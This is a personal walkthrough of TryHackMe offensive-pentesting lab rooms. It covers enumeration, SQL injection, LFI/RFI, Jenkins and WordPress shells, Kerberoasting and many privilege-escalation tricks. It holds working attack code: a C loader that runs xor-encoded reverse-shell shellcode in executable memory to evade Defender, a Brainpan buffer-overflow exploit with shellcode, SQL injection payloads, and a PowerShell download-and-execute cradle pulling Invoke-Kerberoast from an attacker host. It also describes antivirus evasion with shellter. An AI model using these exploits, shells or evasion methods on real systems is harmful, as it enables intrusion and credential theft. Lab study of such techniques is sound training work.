
TryHackMe Offensive Pentesting Walkthrough

These are my study notes for the TryHackMe Offensive Pentesting path. If you happen to come across them, feel free to have a look XD

Getting Started

Kenobi

A quick scan shows a lot of services open.

Enumerating SMB shows a share called anonymous that looks suspicious. It contains a log.txt that is readable but not writable.

Reading log.txt, it looks like a record of generating id_rsa, so the key should be at /home/kenobi/.ssh/id_rsa.

Enumerating NFS shows that /var is exported and can be mounted (the export is /var *).

Searching for an FTP exploit turns up one with RCE, but it doesn't work.

Reading the exploit, it seems to just send a few commands (which could be typed by hand) that make the server copy a file somewhere.

Typing them in by hand shows the real reason it failed: no permission.

Then I remembered the id_rsa path from earlier, so I copied it straight into /var/tmp, which sits under the mountable NFS export.

Mount the NFS export and copy id_rsa back out; that gives kenobi's credential directly. After chmod 600 id_rsa you can SSH straight in.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Privilege Escalation

Looking for SUID files, one stands out: /usr/bin/menu

```shell
find / -perm -u=s -type f 2>/dev/null
```

Running it shows several options; this looks like a binary the user built themselves.

Analysing it with strings shows that it calls other binaries, and without absolute paths.

So just override PATH and it's an easy root.

Proof

user.txt
d0b0f3f53b6caa532a83915e19224899


root.txt
177b3cd8562289f37382721c28381f02



Advanced Exploitation

Steel Mountain

Looks like a lot of ports are open (?

8080 looks vulnerable; a search turns up an RCE exploit.

Change the target and local parameters, run it, and it just works.

Switch to a CMD shell.

Privilege Escalation

Run winPEAS and find bill's credential.

These files look suspicious.

The first exe, whose path contains spaces, looks usable for privesc. tasklist /v shows its user as N/A, which should mean it runs at SYSTEM level.

Checking further, the service name is AdvancedSystemCareService9.

Download shell.exe into C:\Program Files (x86)\IObit\Advanced SystemCare and rename it Advanced.exe.

Finally restart the service to get SYSTEM.

Proof

user.txt
b04763b6fcf51fcd7c13abc7db4fd365


root.txt
9af5f314f57607c00fd09803a587db80



Alfred

8080 looks like it's begging to be hit.

Connecting shows a login page, but admin:admin gets straight in.

Once in, go to project > config and scroll to the bottom to Execute Windows batch command. Change the command to \\10.13.41.118\meow\shell.exe and click Build. That makes it run the shell.exe we generated with Metasploit, giving RCE directly.

Privilege Escalation

whoami /priv shows SeImpersonatePrivilege.

Straight to JuicyPotato.exe. The system is Windows 7 Ultimate, but surprisingly the Windows 7 Enterprise CLSID works (?

```cmd
JuicyPotato.exe -l 1337 -p shell.exe -t * -c {659cdea7-489e-11d9-a9cd-000d56965251}
```

Proof

user.txt
79007a09481963edf2e1321abd9ae2a0


Could only open this one with Metasploit..
root.txt
dff0f748678f280250f25a45b8046b4a



Hackpark

Looks like a web target.

Scanning paths finds a URL that looks like a login page, and connecting confirms it is one.

Blast it with hydra to get a credential; logging in shows the Dashboard.

Searching for exploits turns up several RCEs.

RCE (unintended way)

Running 47011.py gives RCE directly, though the shell is a bit ugly.

RCE (intended way)

Use 46353.cs

First rename 46353.cs to PostView.ascx, then upload it from the post editor.

Remember to point the IP at yourself.

Click NEW > File Manager > Upload

Once the upload finishes, visit http://10.10.185.153/?theme=../../App_Data/files to get RCE.

Privilege Escalation (unintended way)

whoami /priv shows the SeImpersonatePrivilege token, so go straight for the potato.

Privilege Escalation (intended way)

winPEAS shows a suspicious file.

Its service can't be restarted and the machine can't be rebooted. The solution is to look at the logs in the Event folder under its directory, which show a program that keeps running over and over (who would ever think of that ==

Overwrite Message.exe and that's it.

Proof

user.txt
759bd8af507517bcfaede78a21a73e39

root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72


Gamezone

Looks like a web target.

Once in, there's a login box on the left; typing a throwaway payload like admin' or 1=1 -- - gets straight in.

Inside there's a search feature, which is clearly asking for SQL injection.

Poked around the whole database; the payloads are below.

```sql
1' UNION SELECT 1,2,3 -- -

1' UNION SELECT NULL,schema_name,NULL FROM information_schema.schemata -- -

1' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema="db" -- -

1' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name="users" -- -
```

This one hits the credentials:

```sql
1' UNION SELECT NULL,username,pwd FROM db.users -- -
```
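As an added example that is not part of the original write-up, the login bypass and the credential-dumping payload above run against a constructed SQLite stand-in for the app's login and search queries, next to the parameterised versions that defeat them. The query shapes, table contents and hash are assumptions; db.users is written as users because SQLite has no schema prefix.

```python
import hashlib
import sqlite3

# Payloads as used in the write-up (only the schema prefix dropped for SQLite).
LOGIN_BYPASS = "admin' or 1=1 -- -"
DUMP_USERS = "1' UNION SELECT NULL,username,pwd FROM users -- -"


def make_db():
    """Constructed stand-in for the room's database: a users table and a
    three-column post table (the UNION payloads needed exactly three columns)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    pw_hash = hashlib.sha256(b"not-the-real-password").hexdigest()  # constructed
    con.execute("INSERT INTO users VALUES (?, ?)", ("agent47", pw_hash))
    con.execute("CREATE TABLE post (id INTEGER, title TEXT, description TEXT)")
    con.execute("INSERT INTO post VALUES (1, 'Hitman 2016', 'Agent 47 is back')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Assumed shape of the login query: user input pasted into the SQL text,
    so `admin' or 1=1 -- -` turns the WHERE clause into a tautology and
    comments out the password check."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND pwd='{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username, password):
    """Same query with placeholders: the values never become SQL, so the
    payload is just a username that does not exist."""
    sql = "SELECT username FROM users WHERE username=? AND pwd=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def search_vulnerable(con, term):
    """Assumed shape of the search query. The UNION payload closes the LIKE
    string, appends its own SELECT over users, and comments out the rest."""
    sql = f"SELECT id, title, description FROM post WHERE title LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def search_safe(con, term):
    """Parameterised search: the wildcard is built in Python, the term is bound
    as data, and a UNION in the term matches nothing."""
    sql = "SELECT id, title, description FROM post WHERE title LIKE ?"
    return con.execute(sql, (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("bypass vs vulnerable login:", login_vulnerable(con, LOGIN_BYPASS, "x"))
    print("bypass vs safe login:      ", login_safe(con, LOGIN_BYPASS, "x"))
    print("dump vs vulnerable search: ", search_vulnerable(con, DUMP_USERS))
    print("dump vs safe search:       ", search_safe(con, DUMP_USERS))
```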

Dropping the hash into CrackStation gives the plaintext; the credential agent47:videogamer124 logs straight into SSH.

Privilege Escalation (unintended way)

The user's groups include lxd, which immediately suggests an lxd privesc.

First download this neat tool locally,
then in its directory run sudo bash build-alpine,
then run these commands and you're root.

```shell
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
```

Privilege Escalation (intended way)

linPEAS shows port 10000 listening on the machine, but it can't be reached from outside, so tunnel it out and hit it from there.

Tunnel method 1

Poke it out with chisel:

```shell
chisel client 10.13.41.118:21 R:10000:127.0.0.1:10000
chisel server -p 21 --reverse
```

Tunnel method 2

SSH in from the local machine:

```shell
ssh -L 10000:localhost:10000 agent47@10.10.228.67
```

Once the tunnel is up, local port 10000 is reachable directly; it's a login page, and the earlier credential agent47:videogamer124 logs in.

An nmap scan shows the CMS is Webmin 1.580. Searching for exploits for that version leads to John Hammond's GitHub; download the exploit there, add a reverse shell, and it works.

Proof

user.txt
649ac17b1480ac13ef1e4fa579dac95c

root.txt
a4b945830144bdd71908d12d902adeee


Skynet

Quite a lot going on here.

Connecting to the SMB share turns up two files: one looks like a wordlist, the other says to change the password. The other share can't be logged into.

enum4linux turns up a user: milesdyson

Using that username against SMB again gives nothing, so on to the other ports.

Scanning port 80 shows a few suspicious things. /squirrelmail is a login page; brute-forcing it with the username and the wordlist pops a credential.

Logging in with it shows three emails: the first contains the SMB password, the second is binary code that decodes to nothing useful, and the third also seems useless.

The SMB credential logs into the second share; in notes there is something very suspicious:

```
milesdyson:)s{A&2Z=F^n_E.B`
```

Download important.txt and read it; the first item looks like a very suspicious path, but visiting it shows nothing much.

Scanning under that path finds /administrator, which turns out to be CuppaCMS. Searching for exploits finds an LFI.

Following the exploit gives a working LFI; trying RFI as well gives RCE.

```
http://10.10.165.183/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```

Privilege Escalation

linPEAS shows a backup.sh that runs on a schedule as root.

backup.sh cds into /var/www/html and tars something up with a trailing wildcard, which can be abused with this trick.

Proof

user.txt
7ce5c2109a40f958099283600a9ae807

root.txt
3f0372db24753accc7179a282cd6a949


Daily Bugle

Clearly a port 80 target.

A quick scan spits out a lot. README.txt reveals the version: 3.7-something.

Searching for a Joomla 3.7 exploit finds an SQL injection; running it dumps a credential.

Throw the hash at john and the password pops out.

That credential logs in at the login page.

After that I couldn't find an RCE route for ages, until I found this article; just follow it through.
But the template it picks can't be used for RCE; you have to pick Protostar.

Lateral privilege escalation

linPEAS turns up a password; trying it for jjameson works.

Vertical privilege escalation

sudo -l shows yum is allowed. GTFOBins has the matching privesc; follow the second sudo option and you're root.

Proof

user.txt
27a260fe3cba712cfdedb1c86d80442e

root.txt
eec3d53292b1821868266858d7fa6f79


Overpass 2 - Hacked

Wireshark shows the upload path is /development/

Following the TCP stream of the POST to upload.php shows the webshell.

The TCP stream right after the payload is triggered contains the traffic in both directions; the sudo -l part reveals the password.

In there he clones something from GitHub; going over to look at it, it's a backdoor.

Pull down the whole shadow file he cat'ed and run john on it; 4 passwords crack.

Going back to the source, it takes the input, hashes it with the salt and compares it against password; if they match it will

Take the hash the attacker set, combine it with the salt from the program, and run hashcat; the password pops out.

Scan the target machine; if I remember right, 2222 is the port the backdoor opens. Log in with the credential just cracked.

ls -la shows a .suid_bash; running ./.suid_bash -p gives root.

Proof

user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}

root.txt
thm{d53b2684f169360bb9606c333873144d}


Relevant

Probably web or SMB.

The vuln scan reports MS17-010 (?

Unintended way

Running MS17-010checker.py against it says it can't log in; guest:guest doesn't work either. But for some reason smbclient works, and can even download files from the share :(

passwords.txt contains base64-encoded strings; decoding them gives two credentials.

Switching checker.py to Bob's credential finds a usable pipe. Then generate a shell.exe with msfvenom and run send_and_execute.py, but at the end it fails to establish a session because of no respond.

I hit a similar machine in another lab before; here you need zzz_exploit.py, and its PoC has to be patched a bit.

Edit zzz_exploit.py and change the command inside the smb_pwn() function to whatever you want. Since a successful exploit gives code execution as SYSTEM, just add a new user.

Then change the login credential to Bob's and run it. It still reports no respond like before, but the output shows creating file c:\pwned.txt on the target, which means smb_pwn() did run. After that just RDP in.

Next is getting a reverse shell back to the local machine, which makes the follow-up work easier.

?__? wait, no

I originally wanted to bypass it with shellter, but after dropping the file it still got eaten, so I wrote my own reverse shell, partly based on this article.

```c
#include <windows.h>
#include <string.h>

int main() {
    // msfvenom -p windows/x64/shell_reverse_tcp -a x64 -e x64/xor_dynamic LHOST=10.13.41.118 LPORT=443 -f c -b "\x00\x0a\x0d"
    unsigned char meow[] =
        "\xeb\x27\x5b\x53\x5f\xb0\x11\xfc\xae\x75\xfd\x57\x59\x53\x5e"
        "\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\x81\x01"
        "\x74\x07\x80\x3e\x11\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
        "\xff\x14\x11\xe8\x5c\x97\xf0\xe4\xfc\xd4\x14\x14\x14\x55\x45"
        "\x55\x44\x46\x45\x42\x5c\x25\xc6\x71\x5c\x9f\x46\x74\x5c\x9f"
        "\x46\x0c\x5c\x9f\x46\x34\x5c\x9f\x66\x44\x5c\x1b\xa3\x5e\x5e"
        "\x59\x25\xdd\x5c\x25\xd4\xb8\x28\x75\x68\x16\x38\x34\x55\xd5"
        "\xdd\x19\x55\x15\xd5\xf6\xf9\x46\x55\x45\x5c\x9f\x46\x34\x9f"
        "\x56\x28\x5c\x15\xc4\x9f\x94\x9c\x14\x14\x14\x5c\x91\xd4\x60"
        "\x73\x5c\x15\xc4\x44\x9f\x5c\x0c\x50\x9f\x54\x34\x5d\x15\xc4"
        "\xf7\x42\x5c\xeb\xdd\x55\x9f\x20\x9c\x5c\x15\xc2\x59\x25\xdd"
        "\x5c\x25\xd4\xb8\x55\xd5\xdd\x19\x55\x15\xd5\x2c\xf4\x61\xe5"
        "\x58\x17\x58\x30\x1c\x51\x2d\xc5\x61\xcc\x4c\x50\x9f\x54\x30"
        "\x5d\x15\xc4\x72\x55\x9f\x18\x5c\x50\x9f\x54\x08\x5d\x15\xc4"
        "\x55\x9f\x10\x9c\x5c\x15\xc4\x55\x4c\x55\x4c\x4a\x4d\x4e\x55"
        "\x4c\x55\x4d\x55\x4e\x5c\x97\xf8\x34\x55\x46\xeb\xf4\x4c\x55"
        "\x4d\x4e\x5c\x9f\x06\xfd\x43\xeb\xeb\xeb\x49\x5d\xaa\x63\x67"
        "\x26\x4b\x27\x26\x14\x14\x55\x42\x5d\x9d\xf2\x5c\x95\xf8\xb4"
        "\x15\x14\x14\x5d\x9d\xf1\x5d\xa8\x16\x14\x15\xaf\x1e\x19\x3d"
        "\x62\x55\x40\x5d\x9d\xf0\x58\x9d\xe5\x55\xae\x58\x63\x32\x13"
        "\xeb\xc1\x58\x9d\xfe\x7c\x15\x15\x14\x14\x4d\x55\xae\x3d\x94"
        "\x7f\x14\xeb\xc1\x44\x44\x59\x25\xdd\x59\x25\xd4\x5c\xeb\xd4"
        "\x5c\x9d\xd6\x5c\xeb\xd4\x5c\x9d\xd5\x55\xae\xfe\x1b\xcb\xf4"
        "\xeb\xc1\x5c\x9d\xd3\x7e\x04\x55\x4c\x58\x9d\xf6\x5c\x9d\xed"
        "\x55\xae\x8d\xb1\x60\x75\xeb\xc1\x5c\x95\xd0\x54\x16\x14\x14"
        "\x5d\xac\x77\x79\x70\x14\x14\x14\x14\x14\x55\x44\x55\x44\x5c"
        "\x9d\xf6\x43\x43\x43\x59\x25\xd4\x7e\x19\x4d\x55\x44\xf6\xe8"
        "\x72\xd3\x50\x30\x40\x15\x15\x5c\x99\x50\x30\x0c\xd2\x14\x7c"
        "\x5c\x9d\xf2\x42\x44\x55\x44\x55\x44\x55\x44\x5d\xeb\xd4\x55"
        "\x44\x5d\xeb\xdc\x59\x9d\xd5\x58\x9d\xd5\x55\xae\x6d\xd8\x2b"
        "\x92\xeb\xc1\x5c\x25\xc6\x5c\xeb\xde\x9f\x1a\x55\xae\x1c\x93"
        "\x09\x74\xeb\xc1\xaf\xe4\xa1\xb6\x42\x55\xae\xb2\x81\xa9\x89"
        "\xeb\xc1\x5c\x97\xd0\x3c\x28\x12\x68\x1e\x94\xef\xf4\x61\x11"
        "\xaf\x53\x07\x66\x7b\x7e\x14\x4d\x55\x9d\xce\xeb\xc1\x81\x01";

    // Allocate an RWX region, copy the shellcode into it and jump to it.
    void *exec = VirtualAlloc(0, sizeof meow, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        return 1;
    }
    memcpy(exec, meow, sizeof meow);
    ((void(*)())exec)();
    return 0;
}
```

Compile it with VS Code on Windows, drop it over, and Defender doesn't eat it.

Then it hit me: I'm already an administrator, why didn't I just turn Defender off ==

(Addendum: the first time through I accidentally broke 445, so everything above is from a redo

(Update 2: it broke again :(

Intended way

A full port scan shows 49663 and 49669 open. Scanning those specifically shows 49663 is HTTPAPI, and connecting reveals IIS.

Putting the SMB share name and the passwords.txt from the share into the URL path shows the file is served from there.

Since the server is IIS, upload a webshell to get RCE.

Privilege Escalation

With the SeImpersonatePrivilege token, PrintSpoofer64.exe gets System directly.

Proof

user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}

root.txt
THM{1fk5kf469devly1gl320zafgl345pv}


Internal

Web target.

Scanning paths, it looks like WordPress.

Trying admin:admin redirects to the internal.htm domain.

Add the domain to hosts.

WPScan finds one user; brute-forcing pops the credential, which logs straight in.

From there it's the usual routine: Appearance > Theme Editor, change 404.php into a webshell, hit it and you have a shell.

Lateral privilege escalation 1

/opt has a few suspicious things; wp-save.txt contains the credential aubreanna:bubb13guM!@#123, which gets you aubreanna directly.

Lateral privilege escalation 2

linPEAS shows a very suspicious service on 8080 that only accepts connections from 127.0.0.1.

Use chisel to tunnel it out and connect.

It turns out to be Jenkins; hydra pops a credential that logs straight in.

Once in, click New Item > freestyle project > OK, scroll to the bottom to Build > Execute shell, enter the reverse shell there and click save.

Then click Build Now to catch the reverse shell.

Vertical privilege escalation

/opt has a note.txt containing root's credential root:tr0ub13guM!@#123; log in as root with it.

Proof

user.txt
THM{int3rna1_fl4g_1}

root.txt
THM{d0ck3r_d3str0y3r}


Buffer Overflow

Brainpan

A quick scan; looks like the executable is served on port 10000.

dirsearch finds /bin, where the file can be downloaded.

Wrote a quick fuzzing script and watched both sides; the target crashes at around 600 bytes.

```python
#!/usr/bin/python3
from pwn import *
from time import sleep

count = 0
while True:
    try:
        count += 100
        r = remote("192.168.0.18", 9999)
        print(f"Send {count} bytes string to target.")
        r.sendline(b"A" * count)  # pwntools expects bytes, not str
        sleep(1)
        r.close()
    except Exception as e:
        # remote() raises once the target has crashed and stopped listening
        print(f"Error after sending {count} bytes: {e}")
        exit()
```

Next is finding the EIP offset. First generate a pattern string with a tool that ships with Metasploit.

Then another quick script to send it:

```python
#!/usr/bin/python3
from pwn import *

r = remote("192.168.0.18", 9999)
# pattern generated with Metasploit's pattern_create.rb
payload = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
r.sendline(payload)
```

After sending it, EIP reads 35724134. Feeding that to pattern_offset.rb gives an offset of 524.
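To make the 524 transparent, here is a small Python reimplementation of what pattern_create.rb and pattern_offset.rb compute (an added example, not a script from this write-up). EIP holds the four pattern bytes that were popped into it, read little-endian, so the hex value shown in the debugger has to be byte-reversed before it is looked up in the pattern.

```python
import string
import struct


def pattern_create(length):
    """Non-repeating cyclic pattern Aa0Aa1...Aa9Ab0Ab1..., cut to `length`
    characters; the same sequence pattern_create.rb emits."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_hex, length=20280):
    """Offset in the pattern of the four bytes that ended up in EIP.

    The debugger shows EIP as a number (35724134 in the write-up), but those
    bytes were loaded little-endian from the stack, so the pattern fragment
    is the reversed byte order: 34 41 72 35 -> "4Ar5". Returns -1 when the
    value is not from the pattern (EIP was overwritten by something else).
    The default length is the full unique pattern (26 * 26 * 10 * 3 chars).
    """
    value = int(eip_hex, 16)
    fragment = struct.pack("<I", value).decode("ascii", errors="replace")
    return pattern_create(length).find(fragment)


if __name__ == "__main__":
    print(pattern_create(600))            # the 600-byte pattern sent above
    print(pattern_offset("35724134"))     # 524, as pattern_offset.rb reports
```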

Next is finding bad characters. Another quick script, with offset + 4 to overwrite EIP so that the rest of the input lands right below ESP.

Follow in Dump on ESP shows the payload that was sent, but there don't seem to be any bad characters.

Use mona to check for usable modules; brainpan.exe itself has no protections.

Look for a JMP ESP address inside brainpan.exe; there is one.

Finally, put together exploit.py:

```python
#!/usr/bin/python3
from pwn import *

r = remote("192.168.0.18", 9999)
offset = b"A" * 524
nop = p32(0x90909090) * 15
ret_addr = p32(0x311712f3)

# msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 LHOST=192.168.0.23 LPORT=443 EXITFUNC=thread -f python -b "\x00"
buf = b""
buf += b"\xda\xcc\xd9\x74\x24\xf4\x58\xbd\x0b\xf6\xb2\x86\x2b"
buf += b"\xc9\xb1\x5f\x31\x68\x19\x03\x68\x19\x83\xc0\x04\xe9"
buf += b"\x03\x0a\x6c\x70\x4b\xd9\xac\x4a\x55\x6a\x6b\xbe\x3c"
buf += b"\xa2\xba\x8f\x99\x47\xfe\xeb\x28\x0a\xee\xf0\x08\x9b"
buf += b"\xf2\xe9\xca\xe4\x99\xbe\x8e\x6e\x6d\xfc\x72\xbd\x69"
buf += b"\x63\x23\xb3\x38\xd6\x53\xca\x9e\x9a\xf1\x3b\xa8\xac"
buf += b"\x72\xf9\x26\x06\x3e\x17\x13\x68\xa4\xb3\x41\x27\xbe"
buf += b"\x45\x78\xda\x38\x4b\x3e\x1f\xf1\x3d\xf1\x2a\x91\xb1"
buf += b"\x9f\xfc\xd9\x0d\x75\xda\x06\x44\x38\x1b\xdc\xae\x55"
buf += b"\xf1\xf8\x90\xf4\xdf\xb4\x02\xa3\x5f\xb5\x53\x73\xc9"
buf += b"\x5c\x6b\x16\x3a\x7c\xe0\x8a\x15\xee\x1b\x93\x29\x38"
buf += b"\xe9\xf5\xff\x43\xb5\x0f\x3b\x47\xd2\xe0\xba\xc4\x5e"
buf += b"\x48\x26\xcd\x16\x66\xc0\xb6\x97\x30\x41\x6a\x2f\x69"
buf += b"\xcd\x8d\x22\xd3\x49\xf8\x12\xfd\xf9\x36\x02\x3a\x9d"
buf += b"\xbe\x2d\xbc\xee\x2f\x46\x3c\xa4\xf7\x4f\xf5\xaa\xe7"
buf += b"\xbd\xb0\x36\xd9\xb4\xb3\x40\x3e\xaf\x4b\xdd\xce\xb9"
buf += b"\xc2\x87\x78\xe1\x01\xbf\xba\x8c\xb5\x40\x6f\x58\x5d"
buf += b"\x8e\x5c\x77\xc8\x9c\xe0\xe1\x45\xc0\xc2\xd6\x69\x19"
buf += b"\xb1\xe4\x19\x59\x1c\x59\x1f\xb3\x22\xf8\x6c\xab\xa9"
buf += b"\x2c\x10\x15\x75\xba\xb5\x55\xa8\x36\x64\x97\x2e\x9a"
buf += b"\x27\xfd\xc7\x13\xa3\xe8\x29\x5d\xee\x59\xa0\xb5\x4e"
buf += b"\xb6\xfa\xda\x6d\x03\x93\x56\x59\x1e\x32\x98\x8f\xa0"
buf += b"\x92\x69\x21\xeb\x37\x4a\x5d\xf4\x52\x28\x93\x7c\x7c"
buf += b"\xe0\x5f\x71\x93\x75\x21\x53\x25\xb4\x80\xfc\x0b\x59"
buf += b"\x0c\xe6\x96\xd0\x5a\xc0\xd7\x10\x12\x52\x07\xb4\x48"
buf += b"\x9a\x34\xbb\x18\x3c\xc7\x8a\x05\xc5\x86\xc2\x63\x4f"
buf += b"\x2a\xe4\x3a\xd4\x3d\x74\xc1\x48\x7d\x62\x77\x53\xbc"
buf += b"\x59\x31\x9f\x03\x8b\x38\x38\xb7\xa4\x0b\x20\xbb\xd9"
buf += b"\xb4\x0a\x4f\x8d\x8d\x33\xdf\x3a\x4c\x3c\x22\xfd\xa8"
buf += b"\x4b\xf8\x71\x13\x1d\xb5\x6b\xb3\x47\x28\x21\x0b\xdb"
buf += b"\xc2\xc7\xad\xbc\xb3\xc6\x9c\x71\x95\xec\xf9\xec\xce"
buf += b"\xf2\x8d"
shellcode = buf

# padding up to EIP, the JMP ESP address, a NOP sled, then the shellcode at ESP
payload = offset + ret_addr + nop + shellcode
r.sendline(payload)
```

RCE successful.

Then change the target IP and LHOST and it can be moved over to the real box. But what OS is this, a Z: drive??

Going to the root directory, it turns out to be Linux, but what is this shell ==

After a minute of thinking it hit me: msfvenom generated Windows shellcode and this is Linux. Pretty cool that it ran at all ==

Switching the payload to linux/x86/shell_reverse_tcp fixes it.

sudo -l shows a file that can be run without a password.

Running it shows a few options, presumably for reading custom things. The third option, manual, looks suspicious; maybe it can spawn a shell?

sudo /home/anansi/bin/anansi_util manual /bin/sh lands on a strange screen (?

Oh, it's man: whatever follows manual is used as the lookup argument. GTFOBins has a way to spawn a shell from it.

Run sudo /home/anansi/bin/anansi_util manual man first, then type !/bin/sh, and you're root.


Active Directory

Attacktive Directory

enum4linux enumerates SMB.

NetBIOS Domain name: THM-AD

Use Kerbrute to enumerate users.

Use impacket-GetNPUsers to grab the Kerberos 5 hashes that can be requested without a password.

Put them through john and the password comes out.

Logging into the SMB backup share with it yields a second, base64-encoded credential.

With that credential, impacket-secretsdump dumps everyone's NTLM hashes.

evil-winrm logs in directly with Administrator's NTLM hash.


Extra Credit

Corp

Keep pressing the up arrow and the FLAG shows up.

setspn -T medin -Q */* shows fela

Start an HTTP server locally, then have the target connect back to fetch Invoke-Kerberoast.ps1:

```powershell
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.17.5.224/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
```

Once it finishes, open kerb-Hash0.txt to see the hash.

Copy it home and crack it with hashcat; one password pops out.

```shell
hashcat -m 13100 {hashfile} {wordlist}
```

That gives the credential fela:rubenF124; connecting over RDP gets the FLAG.

```shell
xfreerdp +drives /u:fela /p:rubenF124 /v:10.10.117.61
```

Drop PowerUp.ps1 over and run it.

It reveals a path; opening it shows a base64-encoded string, which decodes to the password: Administrator:tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T

RDP straight in. Logging in as Administrator prompts for a password change; just pick something you can remember.

```shell
xfreerdp +drives /u:Administrator /p:"tqjJpEX9Qv8ybKI3yHcc=L\!5e(\!wW;\$T" /v:10.10.117.61
```

FLAG THM{g00d_j0b_SYS4DM1n_M4s73R}


Mr.Robot

Probably a web target.

Scanning paths shows it's WordPress; robots.txt lists two odd paths.

fsocity.dic downloads a file that looks like a wordlist, but it's full of duplicates.

sort | uniq cleans the duplicates out.

Next is brute-forcing the credential, but where the username comes from is a real mystery. Almost every write-up pulls it out of thin air, and I have no idea how to derive it by technical means :(

Entering elliot as the username yields the login-failed text.

WPScan cracks the credential directly: elliot:ER28-0652

```shell
wpscan --url http://10.10.214.246/ --usernames elliot --passwords wordlist.txt
```

That credential gets straight into the Dashboard. Then go to Appearance > Editor, change 404.php into a reverse shell, poke it anywhere and you have RCE.

Lateral privilege escalation

/home/robot has a file called password.raw-md5; dropping the hash inside into CrackStation cracks the password.

Vertical privilege escalation

Looking for SUID files, nmap is one of them.

```shell
nmap --interactive
!sh
```

Flag

key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

key-2-of-3.txt
822c73956184f694993bede3eb39f959

key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4


Retro

Looks like port 80.

The raft-medium-directories.txt wordlist finds /retro

Scanning further down turns up a lot.

/wp-admin redirects to localhost, so edit hosts.

wpscan finds a user called wade.

Next, use cewl against the site to build a wordlist at depth 3; brute-forcing with wpscan and that wordlist gives the credential wade:parzival

That credential logs into the WordPress dashboard.

In the Theme Editor, change 404.php into php that fetches our reverse shell.

For some reason it failed no matter how many times I tried. Trying the same credential over RDP logs in.

```shell
xfreerdp +drives /u:wade /p:parzival /v:10.10.123.111
```

Dropping shell.exe over, it gets eaten by Defender.

Copy the harmless whoami.exe into the current directory, then use shellter to inject the malicious code into it.

Drop the packed program over and you get RCE.

Privilege escalation method 1

Shell method 1

Use the webshell from before to run the packed whoami.exe:

```
view-source:http://localhost/retro/wp-content/themes/twentynineteen/404.php?shell=start%20C:\meow\whoami.exe
```

Shell method 2

Use a Windows webshell:
Windows Reverse Webshell

Shell method 3

Use a Windows webshell, but C:\Windows\Temp doesn't seem writable, so the path has to be changed:
Windows Reverse Webshell

With a shell, the SeImpersonatePrivilege token means JuicyPotato.exe can be used for privesc.

Privilege escalation method 2

  • CVE-2019-1388

Opening Chrome shows a bookmark for CVE-2019-1388.

Opening the link in my own browser shows it's a UAC vulnerability; digging a bit deeper turns up this description:
https://www.zerodayinitiative.com/advisories/ZDI-19-975/

The Recycle Bin contains an hhupd file that needs UAC approval.

Move it to the desktop and open it, then in the details click Show information about the publisher's certificate.

A certificate dialog appears; click the blue link in the middle. It asks which browser to open with; choose IE.

Once IE is open, click the gear in the top right, then File > Save As; a save-location dialog appears.

Navigate to C:\Windows\System32 and change the file name to *.* to see cmd.exe; right-click and open it and you're system.

Privilege escalation method 3

PayloadsAllTheThings, under Privilege Escalation, lists CVE-2017-0213 as a Local Privilege Escalation.

Windows Kernel Exploits happens to have a usable one; transfer the file over and run it for System.

Proof

user.txt
